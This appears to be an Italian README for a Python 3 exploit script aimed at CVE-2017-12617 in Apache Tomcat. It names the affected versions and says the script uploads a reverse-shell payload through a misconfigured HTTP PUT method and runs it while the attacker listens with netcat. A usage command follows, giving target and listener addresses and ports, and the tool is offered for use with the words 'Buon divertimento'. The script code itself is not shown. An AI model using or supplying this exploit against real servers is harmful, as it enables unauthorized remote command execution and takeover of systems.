
CVE-2017-12617 è una vulnerabilità critica che porta all'esecuzione di codice remoto (RCE) in Apache Tomcat.
CVE-2017-12617 è una vulnerabilità critica che porta all'esecuzione di codice remoto (RCE) in Apache Tomcat.
Questa vulnerabilità funziona sulle versioni 9.0.0.M1 - 9.0.0, 8.5.0-8.5.22, 8.0.0.RC1 - 8.0.46, 7.0.0 - 7.0.81.
Testata solo su 8.0.24. La vulnerabilità sfrutta l'opzione PUT malconfigurata sull'applicazione o sull'istanza Tomcat stessa.
Utilizza PUT per inviare un payload di reverse shell al server ed eseguirlo, mentre si è in ascolto con netcat.
Poiché in Internet ci sono molte versioni dello stesso exploit ma basate su python2, l'ho riscritto per funzionare con Python 3.
Buon divertimento.
Esempio di utilizzo:
python3 cve-2017-12617.py -t 127.0.0.1 -p 8888 -l 192.168.1.118 -P 5555
